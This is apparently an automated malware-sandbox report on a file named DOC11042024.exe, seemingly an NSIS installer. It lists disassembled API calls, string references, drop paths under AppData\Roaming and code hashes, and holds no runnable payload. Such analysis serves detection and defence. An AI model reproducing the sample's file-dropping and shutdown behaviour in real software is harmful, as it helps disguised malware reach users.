                                                                              • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\DOC11042024.exe",00000000,?), ref: 0040361B
                                                                              • CreateDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403627
                                                                              • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 0040362E
                                                                              • DeleteFileW.KERNEL32(0041FE90,0041FE90,?, rigges$,?), ref: 00403688
                                                                              • CopyFileW.KERNEL32(00437800,0041FE90,00000001), ref: 0040369C
                                                                              • CloseHandle.KERNEL32(00000000,0041FE90,0041FE90,?,0041FE90,00000000), ref: 004036C9
                                                                              • GetCurrentProcess.KERNEL32(00000028,00000004,00000005,00000004,00000003), ref: 0040371F
                                                                              • ExitWindowsEx.USER32(00000002,00000000), ref: 0040375B
                                                                              • ExitProcess.KERNEL32 ref: 0040377E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                                              • String ID: rigges$$"C:\Users\user\Desktop\DOC11042024.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\turkeyism\beredskabscentre\Tiderip213$C:\Users\user\AppData\Roaming\turkeyism\beredskabscentre\Tiderip213$C:\Users\user\Desktop$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                                              • API String ID: 4107622049-1887619979
                                                                              • Opcode ID: dedd7760869b51cc3789464f0ef13e4d4bcf11ee4ae3e05b52bf87ec2d5dcacc
                                                                              • Instruction ID: cf78befff12c504e24143c894f85e75cf82b38a3423bbf9974adc7f0ee345733
                                                                              • Opcode Fuzzy Hash: dedd7760869b51cc3789464f0ef13e4d4bcf11ee4ae3e05b52bf87ec2d5dcacc
                                                                              • Instruction Fuzzy Hash: 5CB1C470A04211BAD7207F629D49A7B3EACEB45706F00453FF541B62E2D77C9A41CBAE

                                                                              Control-flow Graph (function 00405295)
APIs
• GetDlgItem.USER32(?,00000403), ref: 004052F4
• GetDlgItem.USER32(?,000003EE), ref: 00405303
• GetClientRect.USER32(?,?), ref: 00405340
• GetSystemMetrics.USER32(00000015), ref: 00405348
• SendMessageW.USER32(?,00001061,00000000,00000002), ref: 00405369
• SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040537A
• SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040538D
• SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040539B
• SendMessageW.USER32(?,00001024,00000000,?), ref: 004053AE
• ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004053D0
• ShowWindow.USER32(?,00000008), ref: 004053E4
• GetDlgItem.USER32(?,000003EC), ref: 00405405
• SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405415
• SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040542E
• SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040543A
• GetDlgItem.USER32(?,000003F8), ref: 00405312
  • Part of subcall function 00404126: SendMessageW.USER32(00000028,?,00000001,00403F52), ref: 00404134
• GetDlgItem.USER32(?,000003EC), ref: 00405457
• CreateThread.KERNELBASE(00000000,00000000,Function_00005229,00000000), ref: 00405465
• CloseHandle.KERNELBASE(00000000), ref: 0040546C
• ShowWindow.USER32(00000000), ref: 00405490
• ShowWindow.USER32(?,00000008), ref: 00405495
• ShowWindow.USER32(00000008), ref: 004054DC
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040550E
• CreatePopupMenu.USER32 ref: 0040551F
• AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405534
• GetWindowRect.USER32(?,?), ref: 00405547
• TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040556B
• SendMessageW.USER32(?,00001073,00000000,?), ref: 004055A6
• OpenClipboard.USER32(00000000), ref: 004055B6
• EmptyClipboard.USER32 ref: 004055BC
• GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 004055C8
• GlobalLock.KERNEL32(00000000), ref: 004055D2
• SendMessageW.USER32(?,00001073,00000000,?), ref: 004055E6
• GlobalUnlock.KERNEL32(00000000), ref: 00405606
• SetClipboardData.USER32(0000000D,00000000), ref: 00405611
• CloseClipboard.USER32 ref: 00405617
Strings
Memory Dump Source
• Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
Similarity
• API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
• String ID: {
• API String ID: 590372296-366298937
• Opcode ID: a659e0f8c7bce5681badd59c65a7522d6f2db5b90c9f5564277ea0d1ab4f22af
• Instruction ID: 1ef62d541cf2f76c7d95ba2e9f400cea79786b12962f1b5b9149b1c12766da65
• Opcode Fuzzy Hash: a659e0f8c7bce5681badd59c65a7522d6f2db5b90c9f5564277ea0d1ab4f22af
• Instruction Fuzzy Hash: AFA14A70900208BFEB219F60DD89AAE3B79FB48355F00803AFA05BA1E0C7755D92DF59

Control-flow Graph (rendered graph not captured; legend: Executed / Not Executed)
APIs
• GetVersion.KERNEL32(00000000,Completed,?,0040518D,Completed,00000000,00000000,00000000), ref: 00405F87
• GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 00406005
• GetWindowsDirectoryW.KERNEL32(: Completed,00000400), ref: 00406018
• SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00406054
• SHGetPathFromIDListW.SHELL32(?,: Completed), ref: 00406062
• CoTaskMemFree.OLE32(?), ref: 0040606D
• lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 00406091
• lstrlenW.KERNEL32(: Completed,00000000,Completed,?,0040518D,Completed,00000000,00000000,00000000), ref: 004060EB
Strings
Memory Dump Source
• Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
Similarity
• API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
• String ID: rigges$$: Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
• API String ID: 900638850-84522598
• Opcode ID: f731f8a4d3c6b6348c6b6e6e443dd9dae7956a45be664b2abbff2f05c6191f17
• Instruction ID: 605be8e6da54f4c58925a2f78d45bb94ffb3e1be9b8f8bd2f9690637c51749f3
• Opcode Fuzzy Hash: f731f8a4d3c6b6348c6b6e6e443dd9dae7956a45be664b2abbff2f05c6191f17
• Instruction Fuzzy Hash: EC612371A40505AAEB20CF25CC44AAF37A5EF54314F11C13BE542BA2D1D73D9A92CB9E

Memory Dump Source
• Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f580236a766455552873888b78e05c68bcf9aaf95ea4bf87bf53c54bc59333fe
• Instruction ID: 78a91b0f1f4adf266f5c95a9e88afe478210b3de85181abf3a6e30a75b1d55f3
• Opcode Fuzzy Hash: f580236a766455552873888b78e05c68bcf9aaf95ea4bf87bf53c54bc59333fe
• Instruction Fuzzy Hash: 47F17571D00229CBDF28CFA8C8946ADBBB1FF44305F25856ED856BB281D7385A96CF44

APIs
• FindFirstFileW.KERNELBASE(?,00425720,00424ED8,00405A5B,00424ED8,00424ED8,00000000,00424ED8,00424ED8,?,?,75922EE0,00405751,?,C:\Users\user\AppData\Local\Temp\,75922EE0), ref: 004061F0
• FindClose.KERNELBASE(00000000), ref: 004061FC
Strings
Memory Dump Source
• Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
Similarity
• API ID: Find$CloseFileFirst
• String ID: WB
• API String ID: 2295610775-2854515933
• Opcode ID: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
• Instruction ID: 8da2930a46d37e4a7604f052629edd4a27d238d6de8a80f9863296bed3e08c17
• Opcode Fuzzy Hash: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
• Instruction Fuzzy Hash: ABD012319580709BD6102B387D0C85B7A589B493707614BB6F437F23E0C7389C6586AD

APIs
• GetModuleHandleA.KERNEL32(?,?,00000020,0040335F,00000008), ref: 0040621E
• LoadLibraryA.KERNELBASE(?,?,00000020,0040335F,00000008), ref: 00406229
• GetProcAddress.KERNEL32(00000000,?), ref: 0040623A
Memory Dump Source
• Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
Similarity
• API ID: AddressHandleLibraryLoadModuleProc
• String ID:
• API String ID: 310444273-0
• Opcode ID: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
• Instruction ID: e57d1366724ec87ec330055c9f15167223d91cc6228b83f23ceb327cf4dc0c8d
• Opcode Fuzzy Hash: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
• Instruction Fuzzy Hash: 90E0CD36A08120A7C7115B249D4496773AC9FD9701305043DF505F6240C774FC1297A9

APIs
• CoCreateInstance.OLE32(00407474,?,00000001,00407464,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020BD
Strings
• C:\Users\user\AppData\Roaming\turkeyism\beredskabscentre\Tiderip213, xrefs: 004020F5
Memory Dump Source
• Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
Similarity
• API ID: CreateInstance
• String ID: C:\Users\user\AppData\Roaming\turkeyism\beredskabscentre\Tiderip213
• API String ID: 542301482-2216720624
• Opcode ID: bb776092b858711ba0e5d1da68f81997d2f94b71a391bce3ebd7e25295a46504
• Instruction ID: 10455a5b80b749719a2a32d17afaf26bb6b60e5bb99cb9d50b878c7cb8450fc9
• Opcode Fuzzy Hash: bb776092b858711ba0e5d1da68f81997d2f94b71a391bce3ebd7e25295a46504
• Instruction Fuzzy Hash: 70415175A00105AFCB00DFA4CD88EAD7BB5EF48314F204569F906EB2D1CAB9DD41CB55

                                                                              APIs
                                                                              • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 00402715
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: FileFindFirst
                                                                              • String ID:
                                                                              • API String ID: 1974802433-0
                                                                              • Opcode ID: d8c1f95b986e583fc1cf121e9a04cdb2c76c4f729282b3cd1a1018c5c45ddda8
                                                                              • Instruction ID: 8dbd27fb11e95d49d024c3de352d63adc0bdd1ce85e77c77ad08f6528aeb0517
                                                                              • Opcode Fuzzy Hash: d8c1f95b986e583fc1cf121e9a04cdb2c76c4f729282b3cd1a1018c5c45ddda8
                                                                              • Instruction Fuzzy Hash: 3EF0E275A00100EBC700EBA0D9489EEB378EF04314F6041B7E111F31D0D7B84A41CB2A

                                                                              Control-flow Graph
                                                                              APIs
                                                                                • Part of subcall function 0040620C: GetModuleHandleA.KERNEL32(?,?,00000020,0040335F,00000008), ref: 0040621E
                                                                                • Part of subcall function 0040620C: LoadLibraryA.KERNELBASE(?,?,00000020,0040335F,00000008), ref: 00406229
                                                                                • Part of subcall function 0040620C: GetProcAddress.KERNEL32(00000000,?), ref: 0040623A
                                                                              • lstrcatW.KERNEL32(1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,C:\Users\user\AppData\Local\Temp\,75923420,00000000,"C:\Users\user\Desktop\DOC11042024.exe"), ref: 004038F7
                                                                              • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\turkeyism\beredskabscentre\Tiderip213,1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,C:\Users\user\AppData\Local\Temp\), ref: 00403977
                                                                              • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\turkeyism\beredskabscentre\Tiderip213,1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000), ref: 0040398A
                                                                              • GetFileAttributesW.KERNEL32(: Completed), ref: 00403995
                                                                              • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\turkeyism\beredskabscentre\Tiderip213), ref: 004039DE
                                                                                • Part of subcall function 00405DE9: wsprintfW.USER32 ref: 00405DF6
                                                                              • RegisterClassW.USER32(00428180), ref: 00403A1B
                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A33
                                                                              • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A68
                                                                              • ShowWindow.USER32(00000005,00000000), ref: 00403A9E
                                                                              • LoadLibraryW.KERNELBASE(RichEd20), ref: 00403AAF
                                                                              • LoadLibraryW.KERNEL32(RichEd32), ref: 00403ABA
                                                                              • GetClassInfoW.USER32(00000000,RichEdit20A,00428180), ref: 00403ACA
                                                                              • GetClassInfoW.USER32(00000000,RichEdit,00428180), ref: 00403AD7
                                                                              • RegisterClassW.USER32(00428180), ref: 00403AE0
                                                                              • DialogBoxParamW.USER32(?,00000000,00403C19,00000000), ref: 00403AFF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                              • String ID: "C:\Users\user\Desktop\DOC11042024.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\turkeyism\beredskabscentre\Tiderip213$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                              • API String ID: 914957316-470081751
                                                                              • Opcode ID: 92c2617766b14b4fb783ec7d86720af88888e609603086d5b27b07b453ff5edc
                                                                              • Instruction ID: 8dd1989e48c2adcd6a875d76624611d0fb53d122e5506f9fa3bc233a33b4a0d8
                                                                              • Opcode Fuzzy Hash: 92c2617766b14b4fb783ec7d86720af88888e609603086d5b27b07b453ff5edc
                                                                              • Instruction Fuzzy Hash: 1761C570604601BAE720AF669C46E3B3A6CEB84749F40453FF941B62E2DB785912CA6D

                                                                              Control-flow Graph
                                                                              APIs
                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C55
                                                                              • ShowWindow.USER32(?), ref: 00403C72
                                                                              • DestroyWindow.USER32 ref: 00403C86
                                                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CA2
                                                                              • GetDlgItem.USER32(?,?), ref: 00403CC3
                                                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CD7
                                                                              • IsWindowEnabled.USER32(00000000), ref: 00403CDE
                                                                              • GetDlgItem.USER32(?,00000001), ref: 00403D8C
                                                                              • GetDlgItem.USER32(?,00000002), ref: 00403D96
                                                                              • SetClassLongW.USER32(?,000000F2,?), ref: 00403DB0
                                                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E01
                                                                              • GetDlgItem.USER32(?,00000003), ref: 00403EA7
                                                                              • ShowWindow.USER32(00000000,?), ref: 00403EC8
                                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403EDA
                                                                              • EnableWindow.USER32(?,?), ref: 00403EF5
                                                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F0B
                                                                              • EnableMenuItem.USER32(00000000), ref: 00403F12
                                                                              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F2A
                                                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F3D
                                                                              • lstrlenW.KERNEL32(004226D0,?,004226D0,004281E0), ref: 00403F66
                                                                              • SetWindowTextW.USER32(?,004226D0), ref: 00403F7A
                                                                              • ShowWindow.USER32(?,0000000A), ref: 004040AE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                              • String ID:
                                                                              • API String ID: 3282139019-0
                                                                              • Opcode ID: 3fd5af53ea26621af15d7c5044a3014bafe85ffefd1f887050c8ed1a3cb03858
                                                                              • Instruction ID: 7980c8cf747b8cef6b1672c5771399f4a2adcbcf5af25c6cade82d8abc4c4844
                                                                              • Opcode Fuzzy Hash: 3fd5af53ea26621af15d7c5044a3014bafe85ffefd1f887050c8ed1a3cb03858
                                                                              • Instruction Fuzzy Hash: C5C1AF71A04204FBDB206F61ED45E2B3AA8FB89745F40053EF641B11F1CB799852DB2E

                                                                              Control-flow Graph
                                                                              APIs
                                                                              • GetTickCount.KERNEL32 ref: 00402D66
                                                                              • GetModuleFileNameW.KERNEL32(00000000,00437800,00000400), ref: 00402D82
                                                                                • Part of subcall function 00405B2B: GetFileAttributesW.KERNELBASE(00000003,00402D95,00437800,80000000,00000003), ref: 00405B2F
                                                                                • Part of subcall function 00405B2B: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B51
                                                                              • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00402DCB
                                                                              • GlobalAlloc.KERNELBASE(00000040,00409230), ref: 00402F12
                                                                              Strings
                                                                              • Null, xrefs: 00402E4B
                                                                              • soft, xrefs: 00402E42
                                                                              • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402F5B
                                                                              • C:\Users\user\Desktop, xrefs: 00402DAD, 00402DB2, 00402DB8
                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00402D5F, 00402F2A
                                                                              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00402FA9
                                                                              • Inst, xrefs: 00402E39
                                                                              • Error launching installer, xrefs: 00402DA2
                                                                              • "C:\Users\user\Desktop\DOC11042024.exe", xrefs: 00402D5B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                              • String ID: "C:\Users\user\Desktop\DOC11042024.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                              • API String ID: 2803837635-3253787394
                                                                              • Opcode ID: 97da4d5e289e1c6823f6d21d208570733ed839a1e69cbdd9da071d2ccff4fb3f
                                                                              • Instruction ID: 39e96f3da37de392ad1d16f7a7c40a881931d9dfdf17fa4d6eacf34a14b492bc
                                                                              • Opcode Fuzzy Hash: 97da4d5e289e1c6823f6d21d208570733ed839a1e69cbdd9da071d2ccff4fb3f
                                                                              • Instruction Fuzzy Hash: B461F471940206ABDB209F65DE89BAE37B8EB14358F20417BF904B72D1C7BC9D419B9C

                                                                              Control-flow Graph (entry basic block 401752-401777; rendered graph not reproduced in this text)
                                                                              APIs
                                                                              • lstrcatW.KERNEL32(00000000,00000000,%TMP%,C:\Users\user\AppData\Roaming\turkeyism\beredskabscentre\Tiderip213,?,?,00000031), ref: 00401793
                                                                              • CompareFileTime.KERNEL32(-00000014,?,%TMP%,%TMP%,00000000,00000000,%TMP%,C:\Users\user\AppData\Roaming\turkeyism\beredskabscentre\Tiderip213,?,?,00000031), ref: 004017B8
                                                                                • Part of subcall function 00405EA2: lstrcpynW.KERNEL32(?,?,00000400,0040338A,004281E0,NSIS Error), ref: 00405EAF
                                                                                • Part of subcall function 00405156: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D2A,00000000,?), ref: 0040518E
                                                                                • Part of subcall function 00405156: lstrlenW.KERNEL32(00402D2A,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D2A,00000000), ref: 0040519E
                                                                                • Part of subcall function 00405156: lstrcatW.KERNEL32(Completed,00402D2A,00402D2A,Completed,00000000,00000000,00000000), ref: 004051B1
                                                                                • Part of subcall function 00405156: SetWindowTextW.USER32(Completed,Completed), ref: 004051C3
                                                                                • Part of subcall function 00405156: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004051E9
                                                                                • Part of subcall function 00405156: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405203
                                                                                • Part of subcall function 00405156: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405211
                                                                              Strings
                                                                              Memory Dump Source
